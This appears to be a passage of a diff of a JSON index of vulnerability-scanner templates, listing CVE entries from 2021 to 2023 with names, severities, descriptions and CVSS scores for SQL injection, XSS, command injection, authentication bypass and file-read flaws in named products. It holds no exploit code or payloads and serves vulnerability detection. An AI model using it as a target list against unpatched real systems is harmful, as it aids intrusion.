{"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6- SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"} {"ID":"CVE-2021-37538","Info":{"Name":"PrestaShop SmartBlog \u003c4.0.6 - SQL Injection","Severity":"critical","Description":"PrestaShop SmartBlog by SmartDataSoft \u003c 4.0.6 is vulnerable to a SQL injection vulnerability in the blog archive functionality.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37538.yaml"}
{"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"} {"ID":"CVE-2021-37573","Info":{"Name":"Tiny Java Web Server - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) \u003c=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-37573.yaml"}
{"ID":"CVE-2021-37580","Info":{"Name":"Apache ShenYu Admin JWT - Authentication Bypass","Severity":"critical","Description":"Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37580.yaml"} {"ID":"CVE-2021-37580","Info":{"Name":"Apache ShenYu Admin JWT - Authentication Bypass","Severity":"critical","Description":"Apache ShenYu 2.3.0 and 2.4.0 allow Admin access without proper authentication. The incorrect use of JWT in ShenyuAdminBootstrap allows an attacker to bypass authentication.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-37580.yaml"}
{"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37589.yaml"} {"ID":"CVE-2021-37589","Info":{"Name":"Virtua Software Cobranca \u003c12R - Blind SQL Injection","Severity":"high","Description":"Virtua Cobranca before 12R allows blind SQL injection on the login page.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-37589.yaml"}
@ -1453,6 +1456,7 @@
{"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-44528.yaml"} {"ID":"CVE-2021-44528","Info":{"Name":"Open Redirect in Host Authorization Middleware","Severity":"medium","Description":"Specially crafted \"X-Forwarded-Host\" headers in combination with certain \"allowed host\" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious website.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-44528.yaml"}
{"ID":"CVE-2021-44529","Info":{"Name":"Ivanti EPM Cloud Services Appliance Code Injection","Severity":"critical","Description":"Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44529.yaml"} {"ID":"CVE-2021-44529","Info":{"Name":"Ivanti EPM Cloud Services Appliance Code Injection","Severity":"critical","Description":"Ivanti EPM Cloud Services Appliance (CSA) before version 4.6.0-512 is susceptible to a code injection vulnerability because it allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44529.yaml"}
{"ID":"CVE-2021-44848","Info":{"Name":"Thinfinity VirtualUI User Enumeration","Severity":"medium","Description":"Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-44848.yaml"} {"ID":"CVE-2021-44848","Info":{"Name":"Thinfinity VirtualUI User Enumeration","Severity":"medium","Description":"Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2021/CVE-2021-44848.yaml"}
{"ID":"CVE-2021-44910","Info":{"Name":"SpringBlade - Information Leakage","Severity":"high","Description":"SpringBlade is a comprehensive project upgraded and optimized from a commercial-grade project, featuring both a SpringCloud distributed microservice architecture and a SpringBoot monolithic microservice architecture. The SpringBlade framework has a default SIGN_KEY, which can be exploited by attackers to obtain sensitive information such as user account password logs.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-44910.yaml"}
{"ID":"CVE-2021-45043","Info":{"Name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","Severity":"high","Description":"Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45043.yaml"} {"ID":"CVE-2021-45043","Info":{"Name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","Severity":"high","Description":"Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-45043.yaml"}
{"ID":"CVE-2021-45046","Info":{"Name":"Apache Log4j2 - Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-45046.yaml"} {"ID":"CVE-2021-45046","Info":{"Name":"Apache Log4j2 - Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.","Classification":{"CVSSScore":"9"}},"file_path":"http/cves/2021/CVE-2021-45046.yaml"}
{"ID":"CVE-2021-45092","Info":{"Name":"Thinfinity Iframe Injection","Severity":"critical","Description":"A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the \"vpath\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45092.yaml"} {"ID":"CVE-2021-45092","Info":{"Name":"Thinfinity Iframe Injection","Severity":"critical","Description":"A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the \"vpath\" parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-45092.yaml"}
@ -1477,6 +1481,7 @@
{"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"} {"ID":"CVE-2021-46422","Info":{"Name":"SDT-CW3B1 1.1.0 - OS Command Injection","Severity":"critical","Description":"Telesquare SDT-CW3B1 1.1.0 is affected by an OS command injection vulnerability that allows a remote attacker to execute OS commands without any authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46422.yaml"}
{"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"} {"ID":"CVE-2021-46424","Info":{"Name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","Severity":"critical","Description":"Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2021/CVE-2021-46424.yaml"}
{"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"} {"ID":"CVE-2021-46704","Info":{"Name":"GenieACS =\u003e 1.2.8 - OS Command Injection","Severity":"critical","Description":"In GenieACS 1.2.x before 1.2.8, the UI interface API is vulnerable to unauthenticated OS command injection via the ping host argument (lib/ui/api.ts and lib/ping.ts). The vulnerability arises from insufficient input validation combined with a missing authorization check.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-46704.yaml"}
{"ID":"CVE-2022-0087","Info":{"Name":"Keystone 6 Login Page - Open Redirect and Cross-Site Scripting","Severity":"medium","Description":"On the login page, there is a \"from=\" parameter in URL which is vulnerable to open redirect and can be escalated to reflected XSS.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0087.yaml"}
{"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"} {"ID":"CVE-2022-0140","Info":{"Name":"WordPress Visual Form Builder \u003c3.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0140.yaml"}
{"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"} {"ID":"CVE-2022-0147","Info":{"Name":"WordPress Cookie Information/Free GDPR Consent Solution \u003c2.0.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0147.yaml"}
{"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"} {"ID":"CVE-2022-0148","Info":{"Name":"WordPress All-in-one Floating Contact Form \u003c2.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0148.yaml"}
@ -1990,6 +1995,7 @@
{"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"}
{"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"}
{"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} {"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"}
{"ID":"CVE-2023-22232","Info":{"Name":"Adobe Connect \u003c 12.1.5 - Local File Disclosure","Severity":"medium","Description":"Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-22232.yaml"}
{"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"} {"ID":"CVE-2023-2224","Info":{"Name":"Seo By 10Web \u003c 1.2.7 - Cross-Site Scripting","Severity":"medium","Description":"The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2023/CVE-2023-2224.yaml"}
{"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"} {"ID":"CVE-2023-22432","Info":{"Name":"Web2py URL - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-22432.yaml"}
{"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"} {"ID":"CVE-2023-22463","Info":{"Name":"KubePi JwtSigKey - Admin Authentication Bypass","Severity":"critical","Description":"KubePi is a k8s panel. The jwt authentication function of KubePi through version 1.6.2 uses hard-coded Jwtsigkeys, resulting in the same Jwtsigkeys for all online projects. This means that an attacker can forge any jwt token to take over the administrator account of any online project. Furthermore, they may use the administrator to take over the k8s cluster of the target enterprise. `session.go`, the use of hard-coded JwtSigKey, allows an attacker to use this value to forge jwt tokens arbitrarily. The JwtSigKey is confidential and should not be hard-coded in the code.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-22463.yaml"}
@ -2026,6 +2032,7 @@
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
{"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"} {"ID":"CVE-2023-25573","Info":{"Name":"Metersphere - Arbitrary File Read","Severity":"high","Description":"Metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-25573.yaml"}
{"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"} {"ID":"CVE-2023-25717","Info":{"Name":"Ruckus Wireless Admin - Remote Code Execution","Severity":"critical","Description":"Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25717.yaml"}
{"ID":"CVE-2023-26035","Info":{"Name":"ZoneMinder Snapshots - Command Injection","Severity":"critical","Description":"ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras.Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-26035.yaml"}
{"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"} {"ID":"CVE-2023-26067","Info":{"Name":"Lexmark Printers - Command Injection","Severity":"high","Description":"Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-26067.yaml"}
{"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"} {"ID":"CVE-2023-26255","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjCustomDesignConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26255.yaml"}
{"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"} {"ID":"CVE-2023-26256","Info":{"Name":"STAGIL Navigation for Jira Menu \u0026 Themes \u003c2.0.52 - Local File Inclusion","Severity":"high","Description":"STAGIL Navigation for Jira Menu \u0026 Themes plugin before 2.0.52 is susceptible to local file inclusion via modifying the fileName parameter to the snjFooterNavigationConfig endpoint. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can potentially allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-26256.yaml"}
@ -2078,6 +2085,7 @@
{"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"}
{"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"} {"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"}
{"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"} {"ID":"CVE-2023-30258","Info":{"Name":"MagnusBilling - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-30258.yaml"}
{"ID":"CVE-2023-30534","Info":{"Name":"Cacti \u003c 1.2.25 Insecure Deserialization","Severity":"medium","Description":"Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2023/CVE-2023-30534.yaml"}
{"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"} {"ID":"CVE-2023-30625","Info":{"Name":"Rudder Server \u003c 1.3.0-rc.1 - SQL Injection","Severity":"high","Description":"Rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2023/CVE-2023-30625.yaml"}
{"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} {"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"}
